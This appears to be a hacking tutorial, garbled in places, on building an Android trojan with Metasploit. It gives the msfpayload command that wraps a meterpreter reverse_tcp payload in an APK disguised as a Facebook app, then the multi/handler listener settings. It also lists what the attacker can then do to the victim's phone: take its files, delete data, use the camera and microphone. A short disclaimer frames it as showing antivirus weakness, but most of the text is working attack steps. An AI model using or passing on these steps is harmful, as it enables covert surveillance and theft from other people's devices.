Read Also: 7 tools pentesting for Ubuntu
I state that with this guide I do not want to entice you to do something like this against any person, this guide just wants to deepen how Google Antivirus (and not) Antivirus systems are inefficient, and they are not able to recognize a Malware now known by many years that is the so-called Payload Meterpreter "Android version".
the Payload is called android / meterpreter / reverse_tcp, and what do you ask?
Create a reverse connection between Android (however it is a real trojan) and our PC, so what can we do? The answer is simple, we can access the Android shell (or command line)
we can use commands like cd / storage / sdcard to access the internal memory of the phone and download all the victim's files or eventually delete them, with sysinfo we can have all the info on the Device, the Kernel and the language (java / java), the name (usually @localhost), take pictures with the webcam, record both with a microphone and a camera ... in short, not a few things, among other things risky as in the first case
First phase, malicious APK creation
Creating the Malevolent APK, inside it the PAYLOAD android / meterpreter / reverse_tcp trying to make it seem as far as possible the opposite
We use the command:
sudo msfpayload android / meterpreter / reverse_tcp LHOST = (Your IP) LPORT = (the one you want) R> /root/Desktop/facebook_4.0.apk (for Ubuntu: /home/Writing/facebook_4.0.apk)
then we open a linux shell, and type the command shown above:
for LHOST you have to type in another ifconfig console and see your LOCAL IP
for LPORT put 443
sudo service postgresql start sudo service metasploit start sudo armitage
use exploit / multi / handler set PAYLOAD android / meterpreter / reverse_tcp set LHOST (PC local IP address) set LPORT (the port set when the APK was created) set ExitOnSession false exploit -j
Fifth and final phase, we open the apk and execute various commands
We have set up the listener, so we can start the APK from the phone, we wait a few moments and here in Armitage our device appears with a lot of IP address and logo of the operating system "seized" by lightning